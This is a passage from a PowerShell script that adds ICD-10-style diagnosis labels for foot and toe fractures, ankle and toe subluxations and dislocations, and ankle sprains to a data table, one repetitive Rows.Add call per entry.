foot","Unspecified fracture of left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left foot","Unspecified fracture of left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left foot","Unspecified fracture of left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left foot","Unspecified fracture of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified foot","Unspecified fracture of unspecified foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified foot","Unspecified fracture of unspecified foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified foot","Unspecified fracture of unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified foot","Unspecified fracture of unspecified foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified foot","Unspecified fracture of unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified foot","Unspecified fracture of unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified foot","Unspecified fracture of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right toe(s)","Unspecified fracture of right toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right toe(s)","Unspecified fracture of right toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right toe(s)","Unspecified fracture of right toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right toe(s)","Unspecified fracture of right toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right toe(s)","Unspecified fracture of right toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right toe(s)","Unspecified fracture of right toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right toe(s)","Unspecified fracture of right toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left toe(s)","Unspecified fracture of left toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left toe(s)","Unspecified fracture of left toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left toe(s)","Unspecified fracture of left toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left toe(s)","Unspecified fracture of left toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left toe(s)","Unspecified fracture of left toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left toe(s)","Unspecified fracture of left toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left toe(s)","Unspecified fracture of left toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified toe(s)","Unspecified fracture of unspecified toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified toe(s)","Unspecified fracture of unspecified toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified toe(s)","Unspecified fracture of unspecified toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified toe(s)","Unspecified fracture of unspecified toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified toe(s)","Unspecified fracture of unspecified toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified toe(s)","Unspecified fracture of unspecified toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified toe(s)","Unspecified fracture of unspecified toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of right ankle joint","Subluxation of right ankle joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of right ankle joint","Subluxation of right ankle joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of right ankle joint","Subluxation of right ankle joint, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of left ankle joint","Subluxation of left ankle joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of left ankle joint","Subluxation of left ankle joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of left ankle joint","Subluxation of left ankle joint, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified ankle joint","Subluxation of unspecified ankle joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified ankle joint","Subluxation of unspecified ankle joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of unspecified ankle joint","Subluxation of unspecified ankle joint, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of right ankle joint","Dislocation of right ankle joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of right ankle joint","Dislocation of right ankle joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of right ankle joint","Dislocation of right ankle joint, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of left ankle joint","Dislocation of left ankle joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of left ankle joint","Dislocation of left ankle joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of left ankle joint","Dislocation of left ankle joint, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified ankle joint","Dislocation of unspecified ankle joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified ankle joint","Dislocation of unspecified ankle joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified ankle joint","Dislocation of unspecified ankle joint, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right toe(s)","Unspecified subluxation of right toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right toe(s)","Unspecified subluxation of right toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right toe(s)","Unspecified subluxation of right toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left toe(s)","Unspecified subluxation of left toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left toe(s)","Unspecified subluxation of left toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left toe(s)","Unspecified subluxation of left toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified toe(s)","Unspecified subluxation of unspecified toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified toe(s)","Unspecified subluxation of unspecified toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified toe(s)","Unspecified subluxation of unspecified toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right toe(s)","Unspecified dislocation of right toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right toe(s)","Unspecified dislocation of right toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right toe(s)","Unspecified dislocation of right toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left toe(s)","Unspecified dislocation of left toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left toe(s)","Unspecified dislocation of left toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left toe(s)","Unspecified dislocation of left toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified toe(s)","Unspecified dislocation of unspecified toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified toe(s)","Unspecified dislocation of unspecified toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified toe(s)","Unspecified dislocation of unspecified toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of right great toe","Dislocation of interphalangeal joint of right great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of right great toe","Dislocation of interphalangeal joint of right great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of right great toe","Dislocation of interphalangeal joint of right great toe, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of left great toe","Dislocation of interphalangeal joint of left great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of left great toe","Dislocation of interphalangeal joint of left great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of left great toe","Dislocation of interphalangeal joint of left great toe, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of unspecified great toe","Dislocation of interphalangeal joint of unspecified great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of unspecified great toe","Dislocation of interphalangeal joint of unspecified great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of unspecified great toe","Dislocation of interphalangeal joint of unspecified great toe, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of right lesser toe(s)","Dislocation of interphalangeal joint of right lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of right lesser toe(s)","Dislocation of interphalangeal joint of right lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of right lesser toe(s)","Dislocation of interphalangeal joint of right lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of left lesser toe(s)","Dislocation of interphalangeal joint of left lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of left lesser toe(s)","Dislocation of interphalangeal joint of left lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of left lesser toe(s)","Dislocation of interphalangeal joint of left lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of unspecified lesser toe(s)","Dislocation of interphalangeal joint of unspecified lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of unspecified lesser toe(s)","Dislocation of interphalangeal joint of unspecified lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of unspecified lesser toe(s)","Dislocation of interphalangeal joint of unspecified lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of unspecified toe(s)","Dislocation of interphalangeal joint of unspecified toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of unspecified toe(s)","Dislocation of interphalangeal joint of unspecified toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of interphalangeal joint of unspecified toe(s)","Dislocation of interphalangeal joint of unspecified toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of metatarsophalangeal joint of right great toe","Dislocation of metatarsophalangeal joint of right great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metatarsophalangeal joint of right great toe","Dislocation of metatarsophalangeal joint of right great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metatarsophalangeal joint of right great toe","Dislocation of metatarsophalangeal joint of right great toe, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of metatarsophalangeal joint of left great toe","Dislocation of metatarsophalangeal joint of left great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metatarsophalangeal joint of left great toe","Dislocation of metatarsophalangeal joint of left great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metatarsophalangeal joint of left great toe","Dislocation of metatarsophalangeal joint of left great toe, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of metatarsophalangeal joint of unspecified great toe","Dislocation of metatarsophalangeal joint of unspecified great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metatarsophalangeal joint of unspecified great toe","Dislocation of metatarsophalangeal joint of unspecified great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metatarsophalangeal joint of unspecified great toe","Dislocation of metatarsophalangeal joint of unspecified great toe, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of metatarsophalangeal joint of right lesser toe(s)","Dislocation of metatarsophalangeal joint of right lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metatarsophalangeal joint of right lesser toe(s)","Dislocation of metatarsophalangeal joint of right lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metatarsophalangeal joint of right lesser toe(s)","Dislocation of metatarsophalangeal joint of right lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of metatarsophalangeal joint of left lesser toe(s)","Dislocation of metatarsophalangeal joint of left lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metatarsophalangeal joint of left lesser toe(s)","Dislocation of metatarsophalangeal joint of left lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metatarsophalangeal joint of left lesser toe(s)","Dislocation of metatarsophalangeal joint of left lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of metatarsophalangeal joint of unspecified lesser toe(s)","Dislocation of metatarsophalangeal joint of unspecified lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metatarsophalangeal joint of unspecified lesser toe(s)","Dislocation of metatarsophalangeal joint of unspecified lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metatarsophalangeal joint of unspecified lesser toe(s)","Dislocation of metatarsophalangeal joint of unspecified lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of metatarsophalangeal joint of unspecified toe(s)","Dislocation of metatarsophalangeal joint of unspecified toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metatarsophalangeal joint of unspecified toe(s)","Dislocation of metatarsophalangeal joint of unspecified toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metatarsophalangeal joint of unspecified toe(s)","Dislocation of metatarsophalangeal joint of unspecified toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of right great toe","Subluxation of interphalangeal joint of right great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of right great toe","Subluxation of interphalangeal joint of right great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of right great toe","Subluxation of interphalangeal joint of right great toe, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of left great toe","Subluxation of interphalangeal joint of left great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of left great toe","Subluxation of interphalangeal joint of left great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of left great toe","Subluxation of interphalangeal joint of left great toe, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of unspecified great toe","Subluxation of interphalangeal joint of unspecified great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of unspecified great toe","Subluxation of interphalangeal joint of unspecified great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of unspecified great toe","Subluxation of interphalangeal joint of unspecified great toe, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of right lesser toe(s)","Subluxation of interphalangeal joint of right lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of right lesser toe(s)","Subluxation of interphalangeal joint of right lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of right lesser toe(s)","Subluxation of interphalangeal joint of right lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of left lesser toe(s)","Subluxation of interphalangeal joint of left lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of left lesser toe(s)","Subluxation of interphalangeal joint of left lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of left lesser toe(s)","Subluxation of interphalangeal joint of left lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of unspecified lesser toe(s)","Subluxation of interphalangeal joint of unspecified lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of unspecified lesser toe(s)","Subluxation of interphalangeal joint of unspecified lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of unspecified lesser toe(s)","Subluxation of interphalangeal joint of unspecified lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of unspecified toe(s)","Subluxation of interphalangeal joint of unspecified toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of unspecified toe(s)","Subluxation of interphalangeal joint of unspecified toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of interphalangeal joint of unspecified toe(s)","Subluxation of interphalangeal joint of unspecified toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of metatarsophalangeal joint of right great toe","Subluxation of metatarsophalangeal joint of right great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metatarsophalangeal joint of right great toe","Subluxation of metatarsophalangeal joint of right great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metatarsophalangeal joint of right great toe","Subluxation of metatarsophalangeal joint of right great toe, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of metatarsophalangeal joint of left great toe","Subluxation of metatarsophalangeal joint of left great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metatarsophalangeal joint of left great toe","Subluxation of metatarsophalangeal joint of left great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metatarsophalangeal joint of left great toe","Subluxation of metatarsophalangeal joint of left great toe, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of metatarsophalangeal joint of unspecified great toe","Subluxation of metatarsophalangeal joint of unspecified great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metatarsophalangeal joint of unspecified great toe","Subluxation of metatarsophalangeal joint of unspecified great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metatarsophalangeal joint of unspecified great toe","Subluxation of metatarsophalangeal joint of unspecified great toe, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of metatarsophalangeal joint of right lesser toe(s)","Subluxation of metatarsophalangeal joint of right lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metatarsophalangeal joint of right lesser toe(s)","Subluxation of metatarsophalangeal joint of right lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metatarsophalangeal joint of right lesser toe(s)","Subluxation of metatarsophalangeal joint of right lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of metatarsophalangeal joint of left lesser toe(s)","Subluxation of metatarsophalangeal joint of left lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metatarsophalangeal joint of left lesser toe(s)","Subluxation of metatarsophalangeal joint of left lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metatarsophalangeal joint of left lesser toe(s)","Subluxation of metatarsophalangeal joint of left lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of metatarsophalangeal joint of unspecified lesser toe(s)","Subluxation of metatarsophalangeal joint of unspecified lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metatarsophalangeal joint of unspecified lesser toe(s)","Subluxation of metatarsophalangeal joint of unspecified lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metatarsophalangeal joint of unspecified lesser toe(s)","Subluxation of metatarsophalangeal joint of unspecified lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of metatarsophalangeal joint of unspecified toe(s)","Subluxation of metatarsophalangeal joint of unspecified toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metatarsophalangeal joint of unspecified toe(s)","Subluxation of metatarsophalangeal joint of unspecified toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metatarsophalangeal joint of unspecified toe(s)","Subluxation of metatarsophalangeal joint of unspecified toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right foot","Unspecified subluxation of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right foot","Unspecified subluxation of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right foot","Unspecified subluxation of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left foot","Unspecified subluxation of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left foot","Unspecified subluxation of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left foot","Unspecified subluxation of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified foot","Unspecified subluxation of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified foot","Unspecified subluxation of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified foot","Unspecified subluxation of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right foot","Unspecified dislocation of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right foot","Unspecified dislocation of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right foot","Unspecified dislocation of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left foot","Unspecified dislocation of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left foot","Unspecified dislocation of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left foot","Unspecified dislocation of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified foot","Unspecified dislocation of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified foot","Unspecified dislocation of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified foot","Unspecified dislocation of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of tarsal joint of right foot","Subluxation of tarsal joint of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of tarsal joint of right foot","Subluxation of tarsal joint of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of tarsal joint of right foot","Subluxation of tarsal joint of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of tarsal joint of left foot","Subluxation of tarsal joint of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of tarsal joint of left foot","Subluxation of tarsal joint of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of tarsal joint of left foot","Subluxation of tarsal joint of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of tarsal joint of unspecified foot","Subluxation of tarsal joint of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of tarsal joint of unspecified foot","Subluxation of tarsal joint of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of tarsal joint of unspecified foot","Subluxation of tarsal joint of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of tarsal joint of right foot","Dislocation of tarsal joint of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of tarsal joint of right foot","Dislocation of tarsal joint of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of tarsal joint of right foot","Dislocation of tarsal joint of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of tarsal joint of left foot","Dislocation of tarsal joint of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of tarsal joint of left foot","Dislocation of tarsal joint of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of tarsal joint of left foot","Dislocation of tarsal joint of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of tarsal joint of unspecified foot","Dislocation of tarsal joint of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of tarsal joint of unspecified foot","Dislocation of tarsal joint of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of tarsal joint of unspecified foot","Dislocation of tarsal joint of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of tarsometatarsal joint of right foot","Subluxation of tarsometatarsal joint of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of tarsometatarsal joint of right foot","Subluxation of tarsometatarsal joint of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of tarsometatarsal joint of right foot","Subluxation of tarsometatarsal joint of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of tarsometatarsal joint of left foot","Subluxation of tarsometatarsal joint of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of tarsometatarsal joint of left foot","Subluxation of tarsometatarsal joint of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of tarsometatarsal joint of left foot","Subluxation of tarsometatarsal joint of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of tarsometatarsal joint of unspecified foot","Subluxation of tarsometatarsal joint of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of tarsometatarsal joint of unspecified foot","Subluxation of tarsometatarsal joint of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of tarsometatarsal joint of unspecified foot","Subluxation of tarsometatarsal joint of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of tarsometatarsal joint of right foot","Dislocation of tarsometatarsal joint of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of tarsometatarsal joint of right foot","Dislocation of tarsometatarsal joint of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of tarsometatarsal joint of right foot","Dislocation of tarsometatarsal joint of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of tarsometatarsal joint of left foot","Dislocation of tarsometatarsal joint of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of tarsometatarsal joint of left foot","Dislocation of tarsometatarsal joint of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of tarsometatarsal joint of left foot","Dislocation of tarsometatarsal joint of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of tarsometatarsal joint of unspecified foot","Dislocation of tarsometatarsal joint of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of tarsometatarsal joint of unspecified foot","Dislocation of tarsometatarsal joint of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of tarsometatarsal joint of unspecified foot","Dislocation of tarsometatarsal joint of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Other subluxation of right foot","Other subluxation of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of right foot","Other subluxation of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of right foot","Other subluxation of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Other subluxation of left foot","Other subluxation of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of left foot","Other subluxation of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of left foot","Other subluxation of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Other subluxation of unspecified foot","Other subluxation of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of unspecified foot","Other subluxation of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of unspecified foot","Other subluxation of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Other dislocation of right foot","Other dislocation of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of right foot","Other dislocation of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of right foot","Other dislocation of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Other dislocation of left foot","Other dislocation of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of left foot","Other dislocation of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of left foot","Other dislocation of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Other dislocation of unspecified foot","Other dislocation of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of unspecified foot","Other dislocation of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of unspecified foot","Other dislocation of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified ligament of right ankle","Sprain of unspecified ligament of right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified ligament of right ankle","Sprain of unspecified ligament of right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified ligament of right ankle","Sprain of unspecified ligament of right ankle, sequela") + $null = 